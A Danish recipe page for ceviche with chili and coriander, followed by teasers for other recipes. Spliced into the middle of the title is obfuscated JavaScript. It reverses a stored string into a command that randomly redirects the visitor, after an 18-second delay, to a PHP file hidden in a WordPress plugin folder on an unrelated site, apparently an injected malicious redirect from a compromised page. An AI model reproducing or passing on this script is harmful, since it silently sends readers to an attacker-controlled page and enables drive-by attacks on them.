Ceviche med chili og kori$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ander

Godt nok er ceviche indbegrebet af det latin- og sydamerikanske køkken, men retten – hvor limesaften tilbereder den rå fisk – er ideel til vores himmelstrøg, fordi de danske farvande er så fulde af fantastiske fisk. Server den med et godt drys rød chili for at give den noget varme og karakter, og nyd et glas kølig hvidvin eller en øl til.

Opskrift til 2-4 pers.

½ rødløg, finthakket
250 g meget frisk hellefisk, aborre eller en anden god hvid fisk, skåret i tern på 1-1 ½ cm
½ tsk salt + lidt ekstra
4 lime, saften af
½ appelsin, saften af
1 rød chili, finthakket
1 lille bdt koriander, grofthakket

Kom det hakkede rødløg i isvand i ca. 5 min., og hæld derefter vandet fra.
Vend fisketernerne i salt, og lad det stå 1 minut. Hæld lime- og appelsinsaft over, og vend forsigtigt fisken med chili og løg, til den er dækket. Lad det hele marinere i 10 min. Smag til med salt, chili og lime, og fordel fisken i små skåle med koriander. Server med det samme.

 

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere